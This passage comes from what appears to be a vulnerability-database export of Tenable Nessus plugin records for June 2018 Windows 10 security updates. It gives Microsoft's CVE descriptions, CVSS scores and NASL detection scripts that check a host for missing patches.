An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. 
However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8212, CVE-2018-8215,\n CVE-2018-8216, CVE-2018-8217, CVE-2018-8221)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. 
However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. 
(CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284880/windows-10-update-kb4284880\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3dae2364\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284880.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284880');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284880])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284874.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8216, CVE-2018-8217,\n CVE-2018-8221)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. 
(CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. 
(CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. 
(CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. 
An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284874: Windows 10 Version 1703 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284874.NASL", "href": "https://www.tenable.com/plugins/nessus/110490", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110490);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8169\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8216\",\n \"CVE-2018-8217\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104331,\n 104333,\n 104334,\n 104336,\n 104337,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104356,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284874\");\n script_xref(name:\"MSFT\", value:\"MS18-4284874\");\n\n script_name(english:\"KB4284874: Windows 10 Version 1703 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284874.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser 
Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8216, CVE-2018-8217,\n CVE-2018-8221)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. 
An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. 
The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. 
For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. 
An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284874/windows-10-update-kb4284874\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?19db0c08\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4284874.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284874');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284874])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:13", "description": "The remote Windows host is missing security update 4284819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. 
(CVE-2018-8169)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2018-8218)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
